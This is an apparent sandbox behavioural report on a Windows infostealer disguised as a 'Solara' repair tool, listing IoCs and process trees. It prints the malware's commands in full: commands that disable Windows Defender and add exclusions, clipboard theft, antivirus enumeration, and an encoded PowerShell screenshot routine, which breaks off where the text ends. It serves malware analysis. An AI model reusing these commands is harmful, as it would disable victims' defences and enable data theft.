Analysis
-
max time kernel
94s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24-11-2024 02:06
Behavioral task
behavioral1
Sample
255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
Resource
win10v2004-20241007-en
General
-
Target
255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe
-
Size
6.0MB
-
MD5
b2fe874c2e11c56edf05c5250a8c966f
-
SHA1
06d6e28c3cb46e06195a5f8c360d8eeaddfb1c06
-
SHA256
255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f
-
SHA512
915ec47beaf9a572c135fe0ddcccf2bb18b6620dcaf9fc8069436e4fe8d3dce15424c3043b45668c7c4f81e513bb731d7bd310eacea6ea1e01cb019b1cc71b90
-
SSDEEP
98304:skEtdFBCm/I5NamaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4RxOnAKuP/ty/:szFIm/PeN/FJMIDJf0gsAGK4R0nAKuXq
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4440 powershell.exe 4604 powershell.exe 348 powershell.exe 3968 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 4996 cmd.exe 3552 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 5092 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 19 discord.com 18 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 1400 tasklist.exe 936 tasklist.exe 1912 tasklist.exe -
resource yara_rule behavioral2/files/0x0007000000023cb0-21.dat upx behavioral2/memory/1824-25-0x00007FFEEE3A0000-0x00007FFEEE80E000-memory.dmp upx behavioral2/files/0x0007000000023ca3-27.dat upx behavioral2/memory/1824-30-0x00007FFEFE3D0000-0x00007FFEFE3F4000-memory.dmp upx behavioral2/files/0x0007000000023cae-29.dat upx behavioral2/memory/1824-32-0x00007FFF063E0000-0x00007FFF063EF000-memory.dmp upx behavioral2/files/0x0007000000023cad-34.dat upx behavioral2/files/0x0007000000023caf-35.dat upx behavioral2/files/0x0007000000023caa-48.dat upx behavioral2/files/0x0007000000023ca9-47.dat upx behavioral2/files/0x0007000000023ca8-46.dat upx behavioral2/files/0x0007000000023ca7-45.dat upx behavioral2/files/0x0007000000023ca6-44.dat upx behavioral2/files/0x0007000000023ca5-43.dat upx behavioral2/files/0x0007000000023ca4-42.dat upx behavioral2/files/0x0007000000023ca2-41.dat upx behavioral2/files/0x0007000000023cb5-40.dat upx behavioral2/files/0x0007000000023cb4-39.dat upx behavioral2/files/0x0007000000023cb3-38.dat upx behavioral2/memory/1824-54-0x00007FFEFDC40000-0x00007FFEFDC6D000-memory.dmp upx behavioral2/memory/1824-56-0x00007FFF054E0000-0x00007FFF054F9000-memory.dmp upx behavioral2/memory/1824-58-0x00007FFEFDC20000-0x00007FFEFDC3F000-memory.dmp upx behavioral2/memory/1824-60-0x00007FFEFD6A0000-0x00007FFEFD811000-memory.dmp upx behavioral2/memory/1824-62-0x00007FFEFDC00000-0x00007FFEFDC19000-memory.dmp upx behavioral2/memory/1824-64-0x00007FFEFE3A0000-0x00007FFEFE3AD000-memory.dmp upx behavioral2/memory/1824-66-0x00007FFEFDBD0000-0x00007FFEFDBFE000-memory.dmp upx behavioral2/memory/1824-72-0x00007FFEEDA70000-0x00007FFEEDDE5000-memory.dmp upx behavioral2/memory/1824-74-0x00007FFEFE3D0000-0x00007FFEFE3F4000-memory.dmp upx behavioral2/memory/1824-76-0x00007FFEFDBB0000-0x00007FFEFDBC4000-memory.dmp upx behavioral2/memory/1824-71-0x00007FFEEDDF0000-0x00007FFEEDEA8000-memory.dmp upx behavioral2/memory/1824-70-0x00007FFEEE3A0000-0x00007FFEEE80E000-memory.dmp upx behavioral2/memory/1824-78-0x00007FFEFDC40000-0x00007FFEFDC6D000-memory.dmp upx behavioral2/memory/1824-79-0x00007FFEFE270000-0x00007FFEFE27D000-memory.dmp upx behavioral2/memory/1824-84-0x00007FFEED950000-0x00007FFEEDA68000-memory.dmp upx behavioral2/memory/1824-83-0x00007FFF054E0000-0x00007FFF054F9000-memory.dmp upx behavioral2/memory/1824-105-0x00007FFEFDC20000-0x00007FFEFDC3F000-memory.dmp upx behavioral2/memory/1824-140-0x00007FFEFD6A0000-0x00007FFEFD811000-memory.dmp upx behavioral2/memory/1824-166-0x00007FFEFDC00000-0x00007FFEFDC19000-memory.dmp upx behavioral2/memory/1824-193-0x00007FFEFE3A0000-0x00007FFEFE3AD000-memory.dmp upx behavioral2/memory/1824-208-0x00007FFEFDBD0000-0x00007FFEFDBFE000-memory.dmp upx behavioral2/memory/1824-211-0x00007FFEEDDF0000-0x00007FFEEDEA8000-memory.dmp upx behavioral2/memory/1824-212-0x00007FFEEDA70000-0x00007FFEEDDE5000-memory.dmp upx behavioral2/memory/1824-250-0x00007FFEED950000-0x00007FFEEDA68000-memory.dmp upx behavioral2/memory/1824-260-0x00007FFEEDDF0000-0x00007FFEEDEA8000-memory.dmp upx behavioral2/memory/1824-261-0x00007FFEEDA70000-0x00007FFEEDDE5000-memory.dmp upx behavioral2/memory/1824-259-0x00007FFEFDBD0000-0x00007FFEFDBFE000-memory.dmp upx behavioral2/memory/1824-258-0x00007FFEFE3A0000-0x00007FFEFE3AD000-memory.dmp upx behavioral2/memory/1824-257-0x00007FFEFDC00000-0x00007FFEFDC19000-memory.dmp upx behavioral2/memory/1824-256-0x00007FFEFD6A0000-0x00007FFEFD811000-memory.dmp upx behavioral2/memory/1824-255-0x00007FFEFDC20000-0x00007FFEFDC3F000-memory.dmp upx behavioral2/memory/1824-254-0x00007FFF054E0000-0x00007FFF054F9000-memory.dmp upx behavioral2/memory/1824-253-0x00007FFEFDC40000-0x00007FFEFDC6D000-memory.dmp upx behavioral2/memory/1824-252-0x00007FFF063E0000-0x00007FFF063EF000-memory.dmp upx behavioral2/memory/1824-251-0x00007FFEFE3D0000-0x00007FFEFE3F4000-memory.dmp upx behavioral2/memory/1824-236-0x00007FFEEE3A0000-0x00007FFEEE80E000-memory.dmp upx behavioral2/memory/1824-249-0x00007FFEFE270000-0x00007FFEFE27D000-memory.dmp upx behavioral2/memory/1824-248-0x00007FFEFDBB0000-0x00007FFEFDBC4000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1600 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 5040 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 21 IoCs
pid Process 4440 powershell.exe 4440 powershell.exe 348 powershell.exe 348 powershell.exe 4604 powershell.exe 4604 powershell.exe 3552 powershell.exe 3552 powershell.exe 4440 powershell.exe 4440 powershell.exe 4604 powershell.exe 3552 powershell.exe 732 powershell.exe 732 powershell.exe 348 powershell.exe 348 powershell.exe 732 powershell.exe 3968 powershell.exe 3968 powershell.exe 468 powershell.exe 468 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4440 powershell.exe Token: SeDebugPrivilege 1400 tasklist.exe Token: SeDebugPrivilege 348 powershell.exe Token: SeDebugPrivilege 936 tasklist.exe Token: SeDebugPrivilege 4604 powershell.exe Token: SeIncreaseQuotaPrivilege 2184 WMIC.exe Token: SeSecurityPrivilege 2184 WMIC.exe Token: SeTakeOwnershipPrivilege 2184 WMIC.exe Token: SeLoadDriverPrivilege 2184 WMIC.exe Token: SeSystemProfilePrivilege 2184 WMIC.exe Token: SeSystemtimePrivilege 2184 WMIC.exe Token: SeProfSingleProcessPrivilege 2184 WMIC.exe Token: SeIncBasePriorityPrivilege 2184 WMIC.exe Token: SeCreatePagefilePrivilege 2184 WMIC.exe Token: SeBackupPrivilege 2184 WMIC.exe Token: SeRestorePrivilege 2184 WMIC.exe Token: SeShutdownPrivilege 2184 WMIC.exe Token: SeDebugPrivilege 2184 WMIC.exe Token: SeSystemEnvironmentPrivilege 2184 WMIC.exe Token: SeRemoteShutdownPrivilege 2184 WMIC.exe Token: SeUndockPrivilege 2184 WMIC.exe Token: SeManageVolumePrivilege 2184 WMIC.exe Token: 33 2184 WMIC.exe Token: 34 2184 WMIC.exe Token: 35 2184 WMIC.exe Token: 36 2184 WMIC.exe Token: SeDebugPrivilege 3552 powershell.exe Token: SeDebugPrivilege 1912 tasklist.exe Token: SeIncreaseQuotaPrivilege 2184 WMIC.exe Token: SeSecurityPrivilege 2184 WMIC.exe Token: SeTakeOwnershipPrivilege 2184 WMIC.exe Token: SeLoadDriverPrivilege 2184 WMIC.exe Token: SeSystemProfilePrivilege 2184 WMIC.exe Token: SeSystemtimePrivilege 2184 WMIC.exe Token: SeProfSingleProcessPrivilege 2184 WMIC.exe Token: SeIncBasePriorityPrivilege 2184 WMIC.exe Token: SeCreatePagefilePrivilege 2184 WMIC.exe Token: SeBackupPrivilege 2184 WMIC.exe Token: SeRestorePrivilege 2184 WMIC.exe Token: SeShutdownPrivilege 2184 WMIC.exe Token: SeDebugPrivilege 2184 WMIC.exe Token: SeSystemEnvironmentPrivilege 2184 WMIC.exe Token: SeRemoteShutdownPrivilege 2184 WMIC.exe Token: SeUndockPrivilege 2184 WMIC.exe Token: SeManageVolumePrivilege 2184 WMIC.exe Token: 33 2184 WMIC.exe Token: 34 2184 WMIC.exe Token: 35 2184 WMIC.exe Token: 36 2184 WMIC.exe Token: SeDebugPrivilege 732 powershell.exe Token: SeIncreaseQuotaPrivilege 3612 WMIC.exe Token: SeSecurityPrivilege 3612 WMIC.exe Token: SeTakeOwnershipPrivilege 3612 WMIC.exe Token: SeLoadDriverPrivilege 3612 WMIC.exe Token: SeSystemProfilePrivilege 3612 WMIC.exe Token: SeSystemtimePrivilege 3612 WMIC.exe Token: SeProfSingleProcessPrivilege 3612 WMIC.exe Token: SeIncBasePriorityPrivilege 3612 WMIC.exe Token: SeCreatePagefilePrivilege 3612 WMIC.exe Token: SeBackupPrivilege 3612 WMIC.exe Token: SeRestorePrivilege 3612 WMIC.exe Token: SeShutdownPrivilege 3612 WMIC.exe Token: SeDebugPrivilege 3612 WMIC.exe Token: SeSystemEnvironmentPrivilege 3612 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2440 wrote to memory of 1824 2440 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 83 PID 2440 wrote to memory of 1824 2440 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 83 PID 1824 wrote to memory of 4992 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 84 PID 1824 wrote to memory of 4992 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 84 PID 1824 wrote to memory of 244 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 85 PID 1824 wrote to memory of 244 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 85 PID 1824 wrote to memory of 1908 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 86 PID 1824 wrote to memory of 1908 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 86 PID 1824 wrote to memory of 456 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 90 PID 1824 wrote to memory of 456 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 90 PID 1824 wrote to memory of 1456 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 92 PID 1824 wrote to memory of 1456 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 92 PID 1824 wrote to memory of 4760 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 93 PID 1824 wrote to memory of 4760 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 93 PID 244 wrote to memory of 348 244 cmd.exe 96 PID 244 wrote to memory of 348 244 cmd.exe 96 PID 1908 wrote to memory of 4416 1908 cmd.exe 97 PID 1908 wrote to memory of 4416 1908 cmd.exe 97 PID 4992 wrote to memory of 4440 4992 cmd.exe 98 PID 4992 wrote to memory of 4440 4992 cmd.exe 98 PID 1824 wrote to memory of 4176 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 99 PID 1824 wrote to memory of 4176 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 99 PID 4760 wrote to memory of 1400 4760 cmd.exe 100 PID 4760 wrote to memory of 1400 4760 cmd.exe 100 PID 1824 wrote to memory of 4996 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 102 PID 1824 wrote to memory of 4996 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 102 PID 1456 wrote to memory of 936 1456 cmd.exe 103 PID 1456 wrote to memory of 936 1456 cmd.exe 103 PID 456 wrote to memory of 4604 456 cmd.exe 105 PID 456 wrote to memory of 4604 456 cmd.exe 105 PID 1824 wrote to memory of 1240 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 106 PID 1824 wrote to memory of 1240 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 106 PID 1824 wrote to memory of 4588 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 107 PID 1824 wrote to memory of 4588 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 107 PID 1824 wrote to memory of 4556 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 110 PID 1824 wrote to memory of 4556 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 110 PID 1824 wrote to memory of 3908 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 111 PID 1824 wrote to memory of 3908 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 111 PID 4176 wrote to memory of 2184 4176 cmd.exe 114 PID 4176 wrote to memory of 2184 4176 cmd.exe 114 PID 4996 wrote to memory of 3552 4996 cmd.exe 116 PID 4996 wrote to memory of 3552 4996 cmd.exe 116 PID 4588 wrote to memory of 2188 4588 cmd.exe 117 PID 4588 wrote to memory of 2188 4588 cmd.exe 117 PID 4556 wrote to memory of 5040 4556 cmd.exe 118 PID 4556 wrote to memory of 5040 4556 cmd.exe 118 PID 1240 wrote to memory of 1912 1240 cmd.exe 119 PID 1240 wrote to memory of 1912 1240 cmd.exe 119 PID 3908 wrote to memory of 732 3908 cmd.exe 120 PID 3908 wrote to memory of 732 3908 cmd.exe 120 PID 1824 wrote to memory of 4380 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 121 PID 1824 wrote to memory of 4380 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 121 PID 4380 wrote to memory of 4688 4380 cmd.exe 123 PID 4380 wrote to memory of 4688 4380 cmd.exe 123 PID 1824 wrote to memory of 400 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 124 PID 1824 wrote to memory of 400 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 124 PID 400 wrote to memory of 3500 400 cmd.exe 148 PID 400 wrote to memory of 3500 400 cmd.exe 148 PID 1824 wrote to memory of 3452 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 127 PID 1824 wrote to memory of 3452 1824 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe 127 PID 732 wrote to memory of 2260 732 powershell.exe 129 PID 732 wrote to memory of 2260 732 powershell.exe 129 PID 3452 wrote to memory of 1060 3452 cmd.exe 130 PID 3452 wrote to memory of 1060 3452 cmd.exe 130
Processes
-
C:\Users\Admin\AppData\Local\Temp\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe"C:\Users\Admin\AppData\Local\Temp\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Users\Admin\AppData\Local\Temp\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe"C:\Users\Admin\AppData\Local\Temp\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:244 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()"4⤵PID:4416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\.scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:456 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\.scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:4176 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:4996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:2188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:5040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4Ad